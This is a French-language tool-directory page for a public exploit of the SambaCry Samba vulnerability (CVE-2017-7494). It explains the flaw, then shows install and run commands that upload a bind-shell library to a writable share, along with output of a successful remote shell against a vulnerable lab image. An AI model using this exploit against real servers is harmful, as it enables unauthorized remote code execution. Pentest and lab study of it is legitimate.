Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
exploit-CVE-2017-7494 — SambaCry exploit (CVE-2017-7494) | Kitploit
Outils/GitHubGitHub/00mjk/exploit-cve-2017-7494
Analyse des VulnérabilitésExploitationTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHub00mjk/exploit-cve-2017-7494

exploit-CVE-2017-7494

SambaCry exploit (CVE-2017-7494)

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE SambaCry pour Samba 4.5.9

Samba est une réimplémentation libre du protocole réseau SMB/CIFS. Samba fournit des services de fichiers et d'impression pour divers clients Microsoft Windows et peut s'intégrer à un domaine Microsoft Windows Server, en tant que contrôleur de domaine (DC) ou membre du domaine. Depuis la version 4, il prend en charge les domaines Active Directory et Microsoft Windows NT.

Samba dans la version 4.5.9 et les versions antérieures est vulnérable à une vulnérabilité d'exécution de code à distance nommée SambaCry. CVE-2017-7494 permet aux utilisateurs authentifiés à distance de télécharger une bibliothèque partagée dans un dossier partagé accessible en écriture, et d'effectuer des attaques d'exécution de code pour prendre le contrôle des serveurs qui hébergent des services Samba vulnérables.

Samba 3.x après 3.5.0 et 4.x avant 4.4.14, 4.5.x avant 4.5.10, et 4.6.x avant 4.6.4 ne restreint pas le chemin du fichier lors de l'utilisation de pipes nommés Windows, ce qui permet aux utilisateurs authentifiés à distance de télécharger une bibliothèque partagée dans un dossier partagé accessible en écriture, et d'exécuter du code arbitraire via un pipe nommé conçu.

Exploit

Utilisez poetry pour configurer l'environnement pour cet exploit

root@kitploit:~
pip3 install -r requirements.txt

Ensuite, vous pouvez l'exécuter comme suit :

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s <share> -r <location>/libbindshell-samba.so \
             -u <user> -p <password> -P 6699

Par exemple, si vous utilisez l'image vulnérable de vulnerables/cve-2017-7494 et souhaitez exécuter cet exploit contre celle-ci :

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699

Et vous obtiendrez la sortie suivante

root@kitploit:~
./exploit -t <target> -e libbindshell-samba.so \
             -s data -r /data/libbindshell-samba.so \
             -u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>

Remerciements

La charge utile de ce projet, ainsi que le code, ont été fortement inspirés par opsxcq/exploit-CVE-2017-7494.

Télécharger l’outil